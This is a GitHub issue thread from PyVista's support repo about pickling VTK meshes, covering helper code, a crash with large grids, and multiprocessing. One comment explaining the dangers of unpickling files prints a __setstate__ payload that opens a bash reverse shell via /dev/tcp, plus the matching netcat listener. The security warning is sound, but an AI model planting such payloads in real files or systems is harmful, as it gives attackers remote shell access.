### ISSUE TITLE
Pickling PyVista datasets

### ISSUE THREAD

**Issue by banesullivan** [pyvista/pyvista-support#59]
Here's an example of how to pickle a PyVista dataset! I'm wondering if we should include these methods in PyVista as `pickle`/`unpickle` methods directly on the objects.

```py
import vtk
import pickle
import pyvista as pv

def pickle_vtk(mesh, filename):
    writer = vtk.vtkDataSetWriter()
    writer.SetInputDataObject(mesh)
    writer.SetWriteToOutputString(True)
    writer.SetFileTypeToASCII()
    writer.Write()
    to_serialize = writer.GetOutputString()

    with open(filename, 'wb') as handle:
        pickle.dump(to_serialize, handle, protocol=pickle.HIGHEST_PROTOCOL)

    return filename


def unpickle_vtk(filename):
    with open(filename, 'rb') as handle:
        to_deserialize = pickle.load(handle)

    reader = vtk.vtkDataSetReader()
    reader.ReadFromInputStringOn()
    reader.SetInputString(to_deserialize)
    reader.Update()
    return pv.wrap(reader.GetOutput())


#### Example

from pyvista import examples
mesh = examples.load_random_hills()

fname = 'filename.vtkpickle'
pickle_vtk(mesh, fname)
test = unpickle_vtk(fname)

assert np.allclose(mesh.points, test.points)
assert mesh.n_arrays == test.n_arrays
```

**Comment by banesullivan** [comment]
I would rather use the binary data writer but for some reason the arrays were getting messed up so I kept the data set writer in ASCII mode

**Comment by banesullivan** [comment]
Perhaps there is a way to actually pickle the dataset without writing it to a string? Either way, this works and allows a user to expand these methods to also pickle other data arrays or meta info if needed.

Relevant to https://github.com/pyvista/pyvista/issues/203

**Comment by banesullivan** [comment]
Perhaps a better way would be to implement the  `__getstate__ `/`__setstate__` methods on PyVista meshes to handle all of this... reference https://docs.python.org/2/library/pickle.html#the-pickle-protocol

**Comment by adam-grant-hendry** [comment]
@akaszynski @banesullivan @adeak @tkoyama010 @MatthewFlamm This seems to break depending on dataset size. e.g.

```python
import pickle

import numpy as np
import pyvista as pv
from vtkmodules.vtkIOLegacy import vtkDataSetWriter


def pickle_vtk(mesh, filename):
    writer = vtkDataSetWriter()
    writer.SetInputDataObject(mesh)
    writer.SetWriteToOutputString(True)
    writer.SetFileTypeToBinary()
    writer.Write()
    to_serialize = writer.GetOutputString()

    with open(filename, 'wb') as handle:
        pickle.dump(to_serialize, handle, protocol=pickle.HIGHEST_PROTOCOL)

    return filename


if __name__ == '__main__':
    dims = (2154, 1500, 1167)

    volume = pv.UniformGrid(
        dims=(2154, 1500, 1167),
        spacing=(1, 1, 1),
        origin=(0, 0, 0),
    )

    volume.point_data['scalars'] = np.zeros(
        shape=(dims[0] * dims[1] * dims[2],), dtype=np.uint8
    )

    fname = 'filename.vtkpickle'
    pickle_vtk(volume, fname)  # Crashes
```

However, I have no problem pickling the numpy array by itself to file (this is 3.7 GB).

**Comment by banesullivan** [comment]
Why? It's tough for me to see any benefit/value from "pickling" to a file like this when in reality, you are just saving the contents of the VTK file writer to file and calling it a "pickle". You should just use `.save()` on the mesh to get a file created by a dedicated reader/writer for the mesh type at hand rather than the `vtkDataSetWriter`.

I somewhat regret adding support for "pickling" like this

**Comment by adam-grant-hendry** [comment]
> Why? It's tough for me to see any benefit/value from "pickling" to a file like this when in reality, you are just saving the contents of the VTK file writer to file and calling it a "pickle". You should just use `.save()` on the mesh to get a file created by a dedicated reader/writer for the mesh type at hand rather than the `vtkDataSetWriter`.
> 
> I somewhat regret adding support for "pickling" like this

`.save()` also calls `writer.Write()`, which is where the problem is. Please see [this](https://github.com/pyvista/pyvista/issues/3269#issuecomment-1237366724) and [this](https://github.com/pyvista/pyvista/issues/3269#issuecomment-1238613152).

There are several use cases for pickling, namely marshaling data (when dealing with multiprocessing), but also when users use `pyvistaqt` to make a GUI and need to create a save file that saves more than just a `VTK` dataset. Pickling is a quick way to get the job done. The other alternative would be creating a custom `XML` file and appending `VTK` data to it, but doesn't support marshaling (AFAIK).

**Comment by Onandon11** [comment]
What do you mean with “pickling like this”?

Sorry I thought I join the conversation because we rely heavily on pickling and it would be a bummer if support from pyvista is dropped.

**Comment by adeak** [comment]
@Onandon11 pickling should work just fine and more robustly as of https://github.com/pyvista/pyvista/pull/3286 . Could you please check the main branch and open an issue on the main repo if pickling doesn't work for your use case?

**Comment by adam-grant-hendry** [comment]
> What do you mean with “pickling like this”?

@Onandon11 I had a discussion with @banesullivan , so I can explain what he meant: What I am doing here is _saving pickled data to a file_, which has less value. The original use of pickling data for `pyvista` was when _forking a process_, specifically during multiprocessing of data.

When multiprocessing, Python [marshals](https://en.wikipedia.org/wiki/Marshalling_(computer_science)) its data across processes by pickling. Since pyvista's underlying objects are shared with objects on the C++ side, these aren't picklable by default. So we have to implement `__getstate__()` and `__setstate__()` and binarize our data using readers and writers in order to make a copy of the data. If these methods aren't implemented, we won't be able to use Python's `multiprocessing` out-of-the-box.

Pickling and unpickling _files_ is potentially a security risk if you open untrusted files. Since the data is pure binary, you can't read it before loading it, and the data that's loaded is immediately executed. Hence, a hacker could conceal a file as containing only `pyvista` data, but add malicious commands that get loaded when you open it with `pickle.load()`.

An example vulnerability was given on [realpython.com](https://realpython.com/lessons/security-concerns/). You need a realpython.com account to see the video, but it's important for black hats to know (DISCLAIMER: This is not my example and is for demonstration purposes. It is taught on realpython.com). The exploit is a one-liner:

```python
def __setstate__(self, state):
    # Attack is from local host listening on port 8080 (mimicking a server)
    # This creates an interactive bash session that is a reverse shell to local host listening in on a port.
    os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/localhost/8080 0>&1"')
```

The hacker would listen on port 8080 by running

```
nc -l 8080
```

and gain access to the server. This is just one example of why the [pickle module docs](https://docs.python.org/3/library/pickle.html) have a big disclaimer that says it's not secure.

If you only want to save `pyvista` or `VTK` data, then you won't be binarizing python objects (`int`, `list`, `bool`, etc.), so there's no need to use `pickle` and you can just simply use `writer.write()`. For those who are writing applications and are trying to save more than just `pyvista`/`VTK` data, it's tempting to pickle everything together to create a file, which is what I was attempting to do. However, it's safer to use `JSON`, `XML`, or an equivalent [serialization language](https://en.wikipedia.org/wiki/Serialization) and create a custom file format to save data. Such files can be read and validated prior to loading.

**Note that the above security risk does not apply when using pickled data with multiprocessing as we are. In pyvista, we store the binarized data in an intermediate buffer (i.e. a variable) and pass it between processes. Hence, there is no loading and unloading of files to speak of.**

**ASIDE:** Linux/MacOS supports `forking`, [but Windows does not](https://en.wikipedia.org/wiki/Fork%E2%80%93exec). Windows only supports [`spawning`](https://en.wikipedia.org/wiki/Spawn_(computing)), which is the equivalent of `fork` + `exec` in Linux. The `GIL`, which enables garbage collection via reference counting in Python, prevents threads from running in _parallel_, but not _concurrently_.

The only time I've experienced this issue making a significant difference is when [using multiprocessing with generators](https://github.com/keras-team/keras/issues/10842), specifically with `keras`. On Linux, you can avoid pickling and `fork`, which copies the context over, but since Windows `spawn` is like `fork-exec`, you "lose" data, plus you cannot pickle because (non-top-level) generators are typically not picklable.

- `forking` = a parent process creates a copy of itself (a child) that has an exact copy of all memory segments it uses
- `spawning` = a parent process creates an entirely new child process that does not share its memory and the parent process must wait for the child process to finish before continuing
- `multitasking (parallelism)` = tasks literally run at the same time
- `multithreading (concurrency)` = tasks can start, run, and complete in overlapping time so there is no down time, but only one task runs at a time
- `CPU-bound tasks` = those waiting for data to be crunched
- `I/O-bound tasks` = those waiting for input/output from other processes (i.e. data transferring)

**Comment by adam-grant-hendry** [comment]
@Onandon11 As @adeak pickling is just fine in `pyvista`: it wasn't dropped, just made more robust.

**Comment by adam-grant-hendry** [comment]
@banesullivan It might be good to remove the write-to-file part from your example: (or strike through it/comment it out and add some explanation as to why it's removed):

```python
with open(filename, 'wb') as handle:
        pickle.dump(to_serialize, handle, protocol=pickle.HIGHEST_PROTOCOL)
```

I can remove it from mine as well (I think I just copied your example).
